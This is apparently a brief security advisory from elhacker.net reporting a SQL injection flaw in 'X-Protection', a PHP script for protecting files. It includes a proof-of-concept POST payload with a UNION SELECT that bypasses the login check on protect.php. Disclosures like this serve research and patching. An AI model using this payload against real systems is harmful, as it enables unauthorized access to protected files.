Discovered by Sirdarckcat from elhacker.net
X-Protection is a simple script made for
protectiong files with a simple file inclusion.
There is a SQL injection vulnerability.
==============================================
PoC:
http://www.server.com/protect.php
POST:
username='/&password=/%20AND%201=0%20UNION%20SELECT%20999/*
==============================================
Att.
Sirdarckcat
elhacker.net
–
Att.
[email protected]